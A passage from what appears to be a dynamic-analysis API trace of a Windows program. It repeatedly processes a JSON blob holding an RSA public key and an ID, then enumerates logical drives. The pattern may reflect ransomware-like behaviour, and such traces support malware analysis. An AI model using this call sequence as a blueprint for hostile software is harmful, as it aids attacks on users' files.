KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.160] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3214130 | out: hHeap=0x6e0000) returned 1 [0145.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 543 [0145.160] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x440) returned 0x74cb38 [0145.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da778, cbMultiByte=-1, lpWideCharStr=0x74cb38, cchWideChar=544 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 544 [0145.160] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.161] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0145.161] lstrlenA (lpString="\",\"id\":\"") returned 8 [0145.161] lstrcpyA (in: lpString1=0x98dab78, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.161] lstrcpyA (in: lpString1=0x98da778, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.161] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e200 [0145.162] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x854) returned 0x32134e8 [0145.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x322e200, cbMultiByte=-1, lpWideCharStr=0x32134e8, cchWideChar=1066 | out: lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 43 [0145.162] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3213d48 [0145.162] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32134e8 | out: hHeap=0x6e0000) returned 1 [0145.162] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e200 | out: hHeap=0x6e0000) returned 1 [0145.162] lstrcpyW (in: lpString1=0x521cf0, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.162] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213d48 | out: hHeap=0x6e0000) returned 1 [0145.162] lstrlenA (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 42 [0145.162] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x56) returned 0x32168f0 [0145.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da778, cbMultiByte=-1, lpWideCharStr=0x32168f0, cchWideChar=43 | out: lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned 43 [0145.162] lstrcpyW (in: lpString1=0x521cf0, lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" | out: lpString1="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}") returned="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9\"}" [0145.162] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0145.162] lstrlenW (lpString="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 40 [0145.162] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213120 | out: hHeap=0x6e0000) returned 1 Thread: id = 329 os_tid = 0x35c [0145.412] timeGetTime () returned 0x11344ca [0145.412] GetLastError () returned 0x54f [0145.412] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3bc) returned 0x74eea8 [0145.412] GetCurrentThreadId () returned 0x35c [0145.412] SetLastError (dwErrCode=0x54f) [0145.412] Sleep (dwMilliseconds=0x0) [0145.414] Sleep (dwMilliseconds=0x3e8) [0146.418] GetLogicalDrives () returned 0x4 [0146.418] SetErrorMode (uMode=0x1) returned 0x0 [0146.418] PathFileExistsA (pszPath="C:\\") returned 1 [0146.418] SetErrorMode (uMode=0x0) returned 0x1 [0146.419] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x806) returned 0x3a65050 [0146.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x391fe60, cbMultiByte=-1, lpWideCharStr=0x3a65050, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x31ee720 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap 